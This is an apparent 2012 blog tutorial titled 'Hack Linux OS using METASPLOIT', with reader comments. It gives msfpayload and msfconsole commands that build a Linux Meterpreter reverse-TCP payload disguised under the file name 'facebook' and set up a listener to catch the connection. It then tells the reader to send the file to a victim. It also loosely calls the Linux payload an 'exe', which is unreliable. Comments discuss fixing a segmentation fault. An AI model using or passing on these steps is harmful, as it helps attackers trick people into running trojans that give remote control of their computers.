Monday, October 15, 2012

Hack Linux OS using METASPLOIT

The most common use of msfpayload tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.

msfpayload linux/x86/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 x > /root/Desktop/facebook


ubuntu-exploit


Now we successfully generate the malicious exe File, it will stored on your local computer /root/Desktop/facebook

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

Open your terminal & type following commands.

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.1.6

set lport 4444

exploit


Now send your facebook.exe files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

3 comments:

nasa said...

I am getting error 'segmentation fault' when I try to run this in Ubuntu 12.04(virtual) I tried it with option x (as mentioned above) and also with format 'elf', But both are giving me the same error.

Please help me to sort it out.

Thanks

nirav desai said...

make sure that you work on 32 bit environment.
If session initiation fails (e.g. because the handler isn't set up or there is a network issue preventing it from getting the second stage), the payload will run off the end of the .text section, causing a segfault.So restart metasploit & try it further , if same problem exist tell me.

Unknown said...

is this work on target ubuntu linux server?

Post a Comment

UA-35960349-1